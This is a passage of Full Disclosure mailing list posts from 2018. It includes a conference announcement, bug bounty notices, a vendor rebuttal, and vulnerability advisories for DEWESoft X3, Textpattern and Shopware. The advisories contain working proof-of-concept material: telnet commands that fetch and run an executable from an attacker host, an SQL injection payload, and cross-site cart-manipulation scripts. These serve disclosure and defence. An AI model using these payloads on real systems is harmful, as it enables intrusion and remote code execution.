[FD] hardwear.io CFP is Open & New Security Training in Berlin!

[Yuliya Pliavaka]

Greetings from hardwear.io!

We would like to share few exciting updates that you can expect from
hardwear.io in 2018!

First of all, we are very proud to announce that hardwear.io is going to
hold its first Security Training in Berlin!

Dates: 26 – 27 April 2018

Venue: Novotel Am Tiergarten, Berlin, Germany

Hardware Security Trainings:

-  Practical IOT Hacking by Aseem Jakhar

-  Low-Level Hardware Reversing by Javier-Vazquez Vidal & Ferdinand

-  Side-Channel Attacks 101 by Lejla Batina & Kostas Papagiannopoulos

-  Practical Car Hacking by Guillaume Heilles

Registration is Open. Pre-con proces available till 31st March 2018.


Hardwear.io Conference & Training 2018 will traditionally take place in The
Hague for the 4th time! Mark your calendars to:

Training: 11-12 September

Conference: 13-14 September

Venue: NH Hotels, The Hague, the Netherlands


hardwear.io 2018 Call For Papers is Open till 9th May 2018! Get your
research ready for another successful year!

Best Regards,

Yuliya Pliavaka
Mob. +91-7720825835 <+91%2077208%2025835> / Linkedin
www.hardwear.io  Hardware Security Conference
www.nullcon.net  Nullcon Information Security Conference
www.payatu.com   Payatu Technologies

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] DEWESoft X3 SP1 (64-bit) installer / Remote Internal Command Access - CVE-2018-7756

[hyp3rlinx]

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt
[+] ISR: Apparition Security



Vendor:
=
www.dewesoft.com


Product:
===
DEWESoft X3 SP1 (64-bit) installer - X3
DEWESoft_FULL_X3_SP1_64BIT.exe



Vulnerability Type:
===
Remote Internal Command Access



CVE Reference:
==
CVE-2018-7756



Security Issue:

The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the
"RunExeFile.exe" component does not require authentication
for sessions on TCP port 1999, which allows remote attackers to execute
arbitrary code or access internal commands, as demonstrated by a
RUN command that can launch an .EXE file located at an arbitrary directory
location, download an .EXE from an external URL, or Run
a "SETFIREWALL Off" command.

The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common
Files\DEWESoft Shared\" after installing using the full-install.

Internal commands used by "RunExeFile.exe" for which I could not find any
documentation.

RUN 
RUNEX 
GETFIREWALL
SETFIREWALL Off
KILL 
USERNAME
SHUTDOWN
SENDKEYS
LIST
DWPIPE

Exploit/POC:
=
TELNET x.x.x.x 1999
RUN calc.exe

OR

Launch the victims browser and send them to website for a drive-by download
etc.

TELNET x.x.x.x 1999
RUN http://ATTACKER-IP/DOOM.exe

Then from the TELNET session execute it from Downloads directory.

runexe c:\Users\victim\Downloads\DOOM.exe


Network Access:
===
Remote



Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: February 9, 2018
Vendor "thank you for the warning. We will forward this to the developers
and they will look into it" : February 19, 2018
Inform vendor of disclosure timeline : February 19, 2018
No further replys, update or addressing of the issue by vendor.
Vendor "We will assume that this issue is resolved and close the ticket." :
March 6, 2018
March 10, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SQL Injection in Textpattern <= 4.6.2

[Manuel Garcia Cardenas]

=
MGC ALERT 2018-002
- Original release date: February 12, 2018
- Last revised:  March 12, 2018
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
- CVE-ID: CVE-2018-7474
=

I. VULNERABILITY
-
SQL Injection in Textpattern <= 4.6.2

II. BACKGROUND
-
Textpattern is a free and open-source content management system (CMS) based
on PHP and MySQL, originally developed by Dean Allen and now developed by
Team Textpattern.

III. DESCRIPTION
-
This bug was found using the portal with authentication as administrator.

To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.

It is possible to inject SQL code in the variable "qty" on the page
"index.php".

IV. PROOF OF CONCEPT
-
The following URL's and parameters have been confirmed to all suffer from
SQL injection.

/textpattern/textpattern/index.php?event=link=link_change_pageby=50&_txp_token=baa07ba857d3618ef810b725b9d4d9d8

Note: the variable "_txp_token" doest not work as a anti-csrf.

POC:

/textpattern/textpattern/index.php?event=link=link_change_pageby=50%20into%20outfile%20'%
5cfakesite.com%5c'%3b%20--%20&_txp_token=baa07ba857d3618ef810b725b9d4d9d8

V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.

VI. SYSTEMS AFFECTED
-
Textpattern <= 4.6.2

VII. SOLUTION
-
Disable website until a fix is available.

VIII. REFERENCES
-
https://textpattern.com/

IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).

X. REVISION HISTORY
-
February 12, 2018 1: Initial release
March 12, 2018 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-
February 12, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas
February 12, 2018 2: Send to vendor without response
February 26, 2018 3: Second email to vendor without response
March 12, 2018 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] BitDefender Total Security 2018 - Insecure Pipe Permissions

[Alex BALAN]

Hello,

Allow me to fix this for you:

> On 6 Mar 2018, at 20:04, filipe  wrote:
> 
> =[ Timeline of disclosure
> ]===
> 
> 01/24/2018 - Vendor was informed of the vulnerability.
> 01/29/2018 - Vendor did not respond.

01/25/2018 - We replied notifying you that we’ve opened a ticked with the 
relevant team
01/26/2018 - We asked for a working PoC
01/31/2018 - You replied with a theoretical “PoC” (no code, just a few steps 
which didn’t really help, sadly)
02/01/2018 - We replied asking for a script, a piece of code, a video, anything 
that backs up your claim since we didn’t reproduce it based on the steps you 
provided.
02/12/2018 - We notified you that we closed the ticket since you stopped 
replying

> 01/24/2018 - CVE assigned [2]
> 03/06/2018 - Advisory publication date.

We take our bugbounty programs very seriously and other than some Nigerian 
princes and fake LinkedIn invites we reply to _all_ reports, valid, invalid or 
incredibly ridiculous alike. As such, you may imagine why, when we saw an 
advisory with our name saying “Vendor did not respond”, the team felt a bit 
disappointed for failing to reply for the first time in a few years. Thankfully 
this was not the case.

If you still believe this is a genuine issue, exploitable in real life and you 
have some evidence to back that up, let us know and we’ll gladly reopen the 
ticket.

Cheers,
—
Alex “Jay” BALAN
Chief Security Researcher
Bitdefender


signature.asc
Description: Message signed with OpenPGP

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] PayPal Inc Increases Bug Bounty Payments in 2018 up to 30.000$

[Vulnerability Lab]

Title: PayPal Inc Increases Bug Bounty Payments in 2018 up to 30.000$

URL:
https://www.vulnerability-db.com/?q=articles/2018/03/13/paypal-inc-increases-bug-bounty-payments-2018-3

#bugbounty #security #research #infosec

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] PayPal Inc - New Venmo Bug Bounty Program

[Vulnerability Lab]

Title: PayPal Inc - New Venmo Bug Bounty Program

URL:
https://www.vulnerability-db.com/?q=articles/2018/02/27/paypal-inc-updates-bug-bounty-program-venmo-payments-services

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [RT-SA-2017-012] Shopware Cart Accessible by Third-Party Websites

[RedTeam Pentesting GmbH]

Advisory: Shopware Cart Accessible by Third-Party Websites

RedTeam Pentesting discovered that the shopping cart implemented by Shopware
offers an insecure API. Malicious, third-party websites may abuse this API to
list, add or remove products from a user's cart.


Details
===

Product: Shopware
Affected Versions: 4.0.1 - 5.3.7
Fixed Versions: > 5.4.0
Vulnerability Type: Cross-Site Request Forgery
Security Risk: low
Vendor URL: https://shopware.com
Vendor Status: fixed version released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-012
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction


"Shopware 5 is the next generation of open source e-commerce software made in
Germany. Based on bleeding edge technologies like Symfony 2, Doctrine 2 & Zend
Framework Shopware comes as the perfect platform for your next e-commerce
project. Furthermore Shopware 5 provides an event-driven plugin system and an
advanced hook system, giving you the ability to customize every part of the
platform."
(from the Shopware GitHub repository [1])


More Details


The Shopware web application provides users with a virtual shopping cart to
collect products prior to checkout. This cart is displayed to the user as a
modal sidebar appearing at the right edge of the browser window. Consequently,
Shopware implements several API endpoints to allow JavaScript code to perform
shopping cart operations. These endpoints are implemented in the
"Shopware_Controllers_Frontend_Checkout" class and can be reached through the
following paths:

 * /checkout/ajaxCart
 * /checkout/ajaxAddArticleCart
 * /checkout/ajaxDeleteArticleCart

RedTeam Pentesting discovered that API endpoints support JSONP by specifying a
URL parameter named callback. The origin of calls to the cart API is not
validated. Therefore, any third-party website may make use of this API. If a
customer of a Shopware shop visits a malicious, attacker-controlled website,
JavaScript code on this site may access the user's shopping cart.


Proof of Concept


The following JavaScript snippets demonstrate how to access the cart of a
Shopware shop at "https://example.net; from a third-party website. The
"getJSON" function of jQuery 3 is used to interface with the JSONP API.

By running the following code, the contents of a cart may be retrieved. The
result of the API call is displayed on the browser's developer console.


$.getJSON("https://example.net/checkout/ajaxCart?callback=?;)
.done(console.log);


The following code adds a new product to the cart. In this case, two instances
of product 1234 are added.


$.getJSON(
  "https://example.net/checkout/ajaxAddArticleCart"+
  "?callback=?=1234=2"
).done(console.log);


To remove a product from a user's shopping cart, attackers may use the
following code. An id for the "sDelete" parameter may be obtained through a
prior call to ajaxCart.


$.getJSON(
  "https://example.net/checkout/ajaxDeleteArticleCart"+
  "?callback=?=4321"
).done(console.log);



Workaround
==

Support for JSONP should be removed from the cart AJAX API. This ensures, that
only JavaScript code from the same origin may access the API and respectively
the cart's contents. Furthermore, operations which change the state of the cart,
i.e. adding and removing products, must be protected with CSRF tokens.


Fix
===

Upgrade to Shopware newer than 5.4.0.


Security Risk
=

This vulnerability is rated as a low risk. Disclosure of a user's shopping cart
to attackers may negatively impact the user's privacy. Furthermore, competing
eCommerce sites may use this information to improve sales. By adding or
removing products from a user's cart, attackers can negatively impact a user's
shopping experience and create support effort for the shop operator.


Timeline


2017-08-28 Vulnerability identified
2017-09-13 Customer approved disclosure to vendor
2017-09-14 Vendor notified
2018-02-27 Vendor released fixed version
2018-03-13 Advisory released


References
==

[1] https://github.com/shopware/shopware
[2] https://community.shopware.com/Downloads_cat_448.html#5.4.0


RedTeam Pentesting GmbH
===

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam